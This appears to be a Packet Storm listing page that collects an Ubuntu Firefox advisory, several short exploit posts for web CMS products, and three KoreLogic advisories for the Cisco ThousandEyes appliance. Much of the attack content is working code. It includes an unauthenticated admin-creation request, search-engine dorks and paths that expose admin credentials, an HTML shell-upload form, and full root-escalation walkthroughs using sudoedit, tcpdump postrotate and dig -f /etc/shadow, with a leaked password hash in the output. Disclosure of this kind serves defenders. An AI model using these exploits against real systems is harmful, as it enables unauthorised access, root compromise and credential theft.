Ubuntu Security Notice 6267-3 - USN-6267-1 fixed vulnerabilities and USN-6267-2 fixed minor regressions in Firefox. The update introduced several minor regressions. This update fixes the problem. Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Max Vlasov discovered that Firefox Offscreen Canvas did not properly track cross-origin tainting. An attacker could potentially exploit this issue to access image data from another site in violation of same-origin policy. Alexander Guryanov discovered that Firefox did not properly update the value of a global variable in WASM JIT analysis in some circumstances. An attacker could potentially exploit this issue to cause a denial of service. Mark Brand discovered that Firefox did not properly validate the size of an untrusted input stream. An attacker could potentially exploit this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6267-3August 21, 2023firefox regressions==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:USN-6267-2 caused some minor regressions in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:USN-6267-1 fixed vulnerabilities and USN-6267-2 fixed minor regressions inFirefox. The update introduced several minor regressions. This update fixesthe problem.We apologize for the inconvenience.Original advisory details: Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. (CVE-2023-4047, CVE-2023-4048, CVE-2023-4049, CVE-2023-4051, CVE-2023-4053, CVE-2023-4055, CVE-2023-4056, CVE-2023-4057, CVE-2023-4058)  Max Vlasov discovered that Firefox Offscreen Canvas did not properly track cross-origin tainting. An attacker could potentially exploit this issue to access image data from another site in violation of same-origin policy. (CVE-2023-4045)  Alexander Guryanov discovered that Firefox did not properly update the value of a global variable in WASM JIT analysis in some circumstances. An attacker could potentially exploit this issue to cause a denial of service. (CVE-2023-4046)  Mark Brand discovered that Firefox did not properly validate the size of an untrusted input stream. An attacker could potentially exploit this issue to cause a denial of service. (CVE-2023-4050)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         116.0.3+build2-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6267-3  https://ubuntu.com/security/notices/USN-6267-1  https://launchpad.net/bugs/2032143Package Information:  https://launchpad.net/ubuntu/+source/firefox/116.0.3+build2-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6267-3

Crypto Currency Tracker (CCT) versions 9.5 and below suffer from a flaw that allows an administrative account to be added without authentication.

    # Exploit Title: Crypto Currency Tracker (CCT) - Admin Account Creation (Unauthenticated)# Date: 11.08.2023# Exploit Author: 0xBr# Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008# Version: <=9.5# CVE: CVE-2023-37759POST /en/user/register HTTP/2Host: localhostCookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismissAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 756_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register

Crypto Currency Tracker (CCT) 9.5 Add Administrator

Fara Melk Estate CMS version 1.5.0 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : Fara Melk Estate CMS v1.5.0 unauthorized administrative access Vulnerability                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.20script.ir/                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] unauthorized administrative access. allows users to access the administrative interface.[+] Use Payload : /admin-assets/tables.html#[+] http://127.0.0.1/fara/admin-assets/tables.html#Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Fara Melk Estate CMS 1.5.0 Information Disclosure

Evsanati Radyo version 1.0 suffers from a remote shell upload vulnerability.

====================================================================================================================================  
| # Title     : evsanati radyo v1.0 Remote File Upload Vulnerability                                                               |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |  
| # Vendor    : https://donanimplus.com/b/evsanati-v1-0-radyo-scripti                                                              |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine 

[+] infected file : /upload/yukle.php

[+] Unauthorized administrator access. Allows any visitor to upload malicious files and run them

[+] Some web sites have deleted the upload file so use this code ( note : use after login )

[+] line 5 set your target

<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
</head>

<form action="http://1270.0.0.1/gazipasayalcinemlakcom/upload/yukle.php" method="post" enctype="multipart/form-data">

<div align="center">

<table border="0" cellspacing="0" cellpadding="0">  
  <tr>  
    <td><b>Resmi Secin :</b></td>  
    <td>&nbsp;<input type="file" name="dosya" size="20"></td>  
  </tr>  
  <tr>  
    <td></td>  
    <td><br /><input type="submit" value="Yukle" style="width:220px;"></td>  
  </tr>  
</table>

</div>

</form>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Evsanati Radyo 1.0 Shell Upload

Event Locations CMS version 1.0.1 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : Event Locations CMS V1.0.1 - unrestricted files upload Vulnerability                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://codecanyon.net/item/event-locations-phpmysql-plugin/22100679                                               |  | # Dork      : "/events_edit.php?id="                                                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Allows any visitor to upload malicious files and run them[+] click 2 creat a Nouveau RDV & in Upload Image box upload your Ev!l .[+] go to http://127.0.0.1/cutgg/assets/uploads/ Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Event Locations CMS 1.0.1 Shell Upload

DoorGets CMS version 7.0 suffers from an information leakage vulnerability.

====================================================================================================================================  
| # Title     : DoorGets CMS v7.0 Sensitive information disclosure Vulnerability                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               |   
| # Vendor    : https://sourceforge.net/projects/doorgets-cms/files/latest/download?source=directory                               |    
| # Dork      : "Powered with doorGets ™"                                                                                          |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Payload gives you the username and password for the site script manager.

[+] The problem is caused when the installation folder is not deleted by the user .

[+] In this case the developer made a mistake .

    So that after installation, the script does not delete the installation file or notify the user of changing the folder path or deleting it. 

    It also stores the manager's information in temporary files that any visitor can scan and can use this information to the script control panel.

[+] Use Payload : setup/temp/admin.php

[+] it show you login information for admin access .

[+] http://127.0.0.1/watsingschoolacth/v12/setup/temp/admin.php

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

DoorGets CMS 7.0 Information Disclosure

Emaar Real Estate Agency Directory System version 5.7 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : Emaar – Real Estate Agency Directory System v5.7 Unrestricted File Upload Vulnerability                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             | | # Vendor    : https://codecanyon.net/item/emaar-real-estate-agency-directory-system/23200024?s_rank=92                           |  | # Dork      : "© 2019 Emaar. All Rights Reserved."                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Creat new user & login .[+] Go to http://127.0.0.1/theme.meteros.agency/Emaar/Users/Emaar%20company/edit .[+] upload your Ev!l .[+] Uploaded malicious files can be run remotelyGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Emaar Real Estate Agency Directory System 5.7 Shell Upload

Cisco ThousandEyes Enterprise Agent Virtual Appliance version thousandeyes-va-64-18.04 0.218 suffers from an unpatched vulnerability in sudoedit, allowed by sudo configuration, which permits a low-privilege user to modify arbitrary files as root and subsequently execute arbitrary commands as root.

**Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification**

    KL-001-2023-003: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoeditTitle: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoeditAdvisory ID: KL-001-2023-003Publication Date: 2023.08.17Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-003.txt1. Vulnerability Details      Affected Vendor: ThousandEyes      Affected Product: ThousandEyes Enterprise Agent Virtual Appliance      Affected Version: thousandeyes-va-64-18.04 0.218      Platform: Linux / Ubuntu 18.04      CWE Classification: CWE-1395: Dependency on Vulnerable                          Third-Party Component      CVE ID: CVE-2023-228092. Vulnerability Description      An unpatched vulnerability in 'sudoedit', allowed by sudo      configuration, permits a low-privilege user to modify arbitrary      files as root and subsequently execute arbitrary commands as      root.3. Technical Description    The ThousandEyes Virtual Appliance is distributed with    a restrictive set of commands that can be executed via    sudo, without having to provide the password for the    'thousandeyes' account. However, the ability to execute    sudoedit of a specific file (/etc/hosts) via sudo is permitted    without requiring the password. The sudoedit binary can    be abused to allow the modification of any file on the    filesystem. This is a known security vulnerability (per    https://seclists.org/oss-sec/2023/q1/42), but had not been    disclosed for the ThousandEyes Virtual Appliance. This can be    abused to allow root-level compromise of the virtual appliance.      thousandeyes@thousandeyes-va:~$ id      uid=1000(thousandeyes) gid=1000(thousandeyes) groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)      thousandeyes@thousandeyes-va:~$ sudo -l      Matching Defaults entries for thousandeyes on thousandeyes-va:          env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin      User thousandeyes may run the following commands on thousandeyes-va:          (ALL : ALL) ALL          (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, /bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop              te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart              te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, /usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,              /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, /usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install              te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, /usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*          (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump    Here we see that /usr/local/bin/te-* are executable as root with no    password. Even though sudoedit is only permitted to edit /etc/hosts,    we can use EDITOR= to spawn vim to edit an arbitrary file. Pick one    of those scripts because we can then execute it:      thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config      /usr/local/bin/te-set-config: Python script, ASCII text executable      thousandeyes@thousandeyes-va:~$ EDITOR='vim -- /usr/local/bin/te-set-config' sudoedit /etc/hosts      sudoedit: --: editing files in a writable directory is not permitted      2 files to edit      sudoedit: /etc/hosts unchanged      thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config      /usr/local/bin/te-set-config: ASCII text      thousandeyes@thousandeyes-va:~$ cat /usr/local/bin/te-set-config      /bin/bash      thousandeyes@thousandeyes-va:~$ sudo /usr/local/bin/te-set-config      root@thousandeyes-va:~# id      uid=0(root) gid=0(root) groups=0(root)      root@thousandeyes-va:~#4. Mitigation and Remediation Recommendation      The vendor has released a version which remediates the described      vulnerability. Release notes are available at:      https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwf189945. Credit      This vulnerability was discovered by Jim Becher of      KoreLogic, Inc.6. Disclosure Timeline      2023.04.26 - KoreLogic submits vulnerability details to Cisco.      2023.04.26 - Cisco acknowledges receipt and the intention to                   investigate.      2023.05.04 - Cisco notifies KoreLogic that a remediation for this                   vulnerability is expected to be available within                   90 days.      2023.06.30 - 45 business days have elapsed since KoreLogic reported                   this vulnerability to the vendor.      2023.07.11 - Cisco informs KoreLogic that the issue has been                   remediated in the latest ThousandEyes Virtual                   Appliance and a Third Party Software Release Note                   Enclosure will be released 2023.08.16. Cisco                   provides CVE-2023-22809 to track this vulnerability.      2023.07.24 - 60 business days have elapsed since KoreLogic reported                   this vulnerability to the vendor.      2023.08.16 - Cisco public acknowledgement.      2023.08.17 - KoreLogic public disclosure.7. Proof of Concept      See 3. Technical Description.The contents of this advisory are copyright(c) 2023KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification

Cisco ThousandEyes Enterprise Agent Virtual Appliance version thousandeyes-va-64-18.04 0.218 has an insecure sudo configuration which permits a low-privilege user to run arbitrary commands as root via the tcpdump command without a password.

    KL-001-2023-002: Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation via tcpdumpTitle: Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation via tcpdumpAdvisory ID: KL-001-2023-002Publication Date: 2023.08.17Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-002.txt1. Vulnerability Details      Affected Vendor: ThousandEyes      Affected Product: ThousandEyes Enterprise Agent Virtual Appliance      Affected Version: thousandeyes-va-64-18.04 0.218      Platform: Linux / Ubuntu 18.04      CWE Classification: CWE-1395: Dependency on Vulnerable                          Third-Party Component      CVE ID: CVE-2023-202242. Vulnerability Description      An insecure sudo configuration permits a low-privilege user      to run arbitrary commands as root via the 'tcpdump' command      without a password.3. Technical Description      The ThousandEyes Virtual Appliance is distributed with a      restrictive set of commands that can be executed via sudo,      without having to provide the password for the 'thousandeyes'      account. However, the ability to execute tcpdump via sudo is      permitted without requiring the password. The post-rotate      functionality of tcpdump can be used to execute arbitrary      commands on the virtual appliance, allowing a privilege      escalation to root. This is a known privilege escalation      path, but had not been disclosed for the ThousandEyes Virtual      Appliance.        $ ssh -c aes256-ctr -p 22 -i 1000eyes-id_rsa thousandeyes@1.3.3.7        Welcome to ThousandEyes!        Last login: Tue Jan  3 20:16:37 2023 from 1.3.3.8        thousandeyes@thousandeyes-va:~$ id        uid=1000(thousandeyes) gid=1000(thousandeyes) groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)        thousandeyes@thousandeyes-va:~$ sudo -l        Matching Defaults entries for thousandeyes on thousandeyes-va:            env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin        User thousandeyes may run the following commands on thousandeyes-va:            (ALL : ALL) ALL            (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, /bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop                te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart                te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, /usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,                /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, /usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install                te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, /usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*            (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump      Here we see that tcpdump is available as root with no password,      and no restrictions on the arguments it can be passed.      Prepare a malicious script, then have tcpdump execute it as a      postrotate command. Note, this needs to be more than simply      a setuid copy of bash as it will drop privs if UID!=EUID, but      python will not.        thousandeyes@thousandeyes-va:~$ cat /tmp/x4        COMMAND='cp /usr/bin/python3.6 /python3.6; chmod u+s /python3.6'        TF=$(mktemp)        echo "$COMMAND" > $TF        chmod +x $TF        sudo /usr/sbin/tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root        thousandeyes@thousandeyes-va:~$ cat /tmp/runme4        /python3.6 -c 'import os; os.setuid(0); os.system("/bin/sh")'        thousandeyes@thousandeyes-va:~$ /tmp/x4        dropped privs to root        tcpdump: listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes      In another ssh session as the 'thousandeyes' user, execute      'ping -c 1 127.0.0.1' to trigger tcpdump rotation:        Maximum file limit reached: 1        1 packet captured        4 packets received by filter        0 packets dropped by kernel      Execute the setuid python which then launches a shell:        thousandeyes@thousandeyes-va:/tmp$ /tmp/runme4        # id        uid=0(root) gid=1000(thousandeyes) groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)        # bash        root@thousandeyes-va:~# id        uid=0(root) gid=1000(thousandeyes) groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)        root@thousandeyes-va:~# cat /etc/shadow        root:!:19145:0:99999:7:::        daemon:!*:18885:0:99999:7:::        bin:!*:18885:0:99999:7:::        sys:!*:18885:0:99999:7:::        sync:!*:18885:0:99999:7:::        games:!*:18885:0:99999:7:::        man:!*:18885:0:99999:7:::        lp:!*:18885:0:99999:7:::        mail:!*:18885:0:99999:7:::        news:!*:18885:0:99999:7:::        uucp:!*:18885:0:99999:7:::        proxy:!*:18885:0:99999:7:::        www-data:!*:18885:0:99999:7:::        backup:!*:18885:0:99999:7:::        list:!*:18885:0:99999:7:::        irc:!*:18885:0:99999:7:::        gnats:!*:18885:0:99999:7:::        nobody:*:18885:0:99999:7:::        systemd-network:!*:18885:0:99999:7:::        systemd-resolve:!*:18885:0:99999:7:::        syslog:!*:18885:0:99999:7:::        messagebus:!*:18885:0:99999:7:::        _apt:!*:18885:0:99999:7:::thousandeyes:$6$qvB7Zfsh1fFCuBM9$l3X3Gj/7v.IY54N5YMFj5hpd.FbYOfqFPRcNxcOslO3M1MFfxcnUk1MNqtivetWIOTIfv.Z3ELQh5PPTUc2YL0:19146:7:364:30:::        rdnssd:!*:19146:7:99999:30:::        browserbot:!:19146::::::        cntlm:!*:19146:7:99999:30:::        sshd:!*:19146:7:99999:30:::        root@thousandeyes-va:~#4. Mitigation and Remediation Recommendation      The vendor has released a version which remediates the described      vulnerability. Release notes are available at:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-thoueye-privesc-NVhHGwb35. Credit      This vulnerability was discovered by Jim Becher of      KoreLogic, Inc.6. Disclosure Timeline      2023.04.26 - KoreLogic submits vulnerability details to Cisco.      2023.04.26 - Cisco acknowledges receipt and the intention to                   investigate.      2023.05.04 - Cisco notifies KoreLogic that a remediation for this                   vulnerability is expected to be available within                   90 days.      2023.06.30 - 45 business days have elapsed since KoreLogic reported                   this vulnerability to the vendor.      2023.07.11 - Cisco informs KoreLogic that the issue has been                   remediated in the latest ThousandEyes Virtual                   Appliance and a public advisory will be released                   2023.08.16.      2023.07.24 - 60 business days have elapsed since KoreLogic reported                   this vulnerability to the vendor.      2023.08.09 - Cisco provides KoreLogic with CVE-2023-20224 to                   track this vulnerability.      2023.08.16 - Cisco public acknowledgement.      2023.08.17 - KoreLogic public disclosure.7. Proof of Concept      See 3. Technical Description.The contents of this advisory are copyright(c) 2023KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation

Cisco ThousandEyes Enterprise Agent Virtual Appliance version thousandeyes-va-64-18.04 0.218 has an insecure sudo configuration which permits a low-privilege user to read root-only files via the dig command without a password.

    KL-001-2023-001: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Read via sudo digTitle: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Read via sudo digAdvisory ID: KL-001-2023-001Publication Date: 2023.08.17Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-001.txt1. Vulnerability Details      Affected Vendor: ThousandEyes      Affected Product: ThousandEyes Enterprise Agent Virtual Appliance      Affected Version: thousandeyes-va-64-18.04 0.218      Platform: Linux / Ubuntu 18.04      CWE Classification: CWE-1395: Dependency on Vulnerable                          Third-Party Component,                          CWE-1220: Insufficient Granularity of                          Access Control      CVE ID: CVE-2023-202172. Vulnerability Description      An insecure sudo configuration permits a low-privilege user      to read root-only files via the 'dig' command without a      password.3. Technical Description      The ThousandEyes Virtual Appliance is distributed with a      restrictive set of commands that can be executed via sudo,      without having to provide the password for the 'thousandeyes'      account. However, the ability to execute dig via sudo,      allows for reading of arbitrary files using dig's "batch"      mode. This mode allows a user to specify a file of requests,      one per line. The dig command will read the file with elevated      privileges and display the resulting queries (i.e. file      contents) back to the user.        thousandeyes@thousandeyes-va:~$ id        uid=1000(thousandeyes) gid=1000(thousandeyes) groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)        thousandeyes@thousandeyes-va:~$ sudo -l        Matching Defaults entries for thousandeyes on thousandeyes-va:            env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin        User thousandeyes may run the following commands on thousandeyes-va:            (ALL : ALL) ALL            (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, /bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop                te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart                te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, /usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,                /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, /usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install                te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, /usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*            (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump      Here we see that dig is available as root with no password,      and no restrictions on the arguments it can be passed.        thousandeyes@thousandeyes-va:~$ sudo /usr/bin/dig -f /etc/shadow        ; <<>> DiG 9.11.3-1ubuntu1.17-Ubuntu <<>> root:!:19145:0:99999:7:::        ;; global options: +cmd        ;; Got answer:        ;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 40036        ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1        ;; OPT PSEUDOSECTION:        ; EDNS: version: 0, flags:; udp: 65494        ;; QUESTION SECTION:        ;root:!:19145:0:99999:7:::.    IN    A        ;; Query time: 0 msec        ;; SERVER: 127.0.0.53#53(127.0.0.53)        ;; WHEN: Fri Mar 31 08:00:38 UTC 2023        ;; MSG SIZE  rcvd: 54        ; <<>> DiG 9.11.3-1ubuntu1.17-Ubuntu <<>> daemon:!*:18885:0:99999:7:::        ;; Got answer:        ;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 32743        ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1        ;; OPT PSEUDOSECTION:        ; EDNS: version: 0, flags:; udp: 65494        ;; QUESTION SECTION:        ;daemon:!*:18885:0:99999:7:::.    IN    A        ...;thousandeyes:$6$qvB7Zfsh1fFCuBM9$l3X3Gj/7v.IY54N5YMFj5hpd.Fb...        ...4. Mitigation and Remediation Recommendation      The vendor has released a version which remediates the described      vulnerability. Release notes are available at:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-te-va-priv-esc-PUdgrx8E5. Credit      This vulnerability was discovered by Jim Becher and Hank      Leininger of KoreLogic, Inc.6. Disclosure Timeline      2023.04.26 - KoreLogic submits vulnerability details to Cisco.      2023.04.26 - Cisco acknowledges receipt and the intention to                   investigate.      2023.05.04 - Cisco notifies KoreLogic that a remediation for this                   vulnerability is expected to be available within                   90 days.      2023.06.30 - 45 business days have elapsed since KoreLogic reported                   this vulnerability to the vendor.      2023.07.11 - Cisco informs KoreLogic that the issue has been                   remediated in the latest ThousandEyes Virtual                   Appliance and a public advisory will be released                   2023.08.16.      2023.07.24 - 60 business days have elapsed since KoreLogic reported                   this vulnerability to the vendor.      2023.08.09 - Cisco provides KoreLogic with CVE-2023-20217 to                   track this vulnerability.      2023.08.16 - Cisco public acknowledgement.      2023.08.17 - KoreLogic public disclosure.7. Proof of Concept      See 3. Technical Description.The contents of this advisory are copyright(c) 2023KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Source

Packet Storm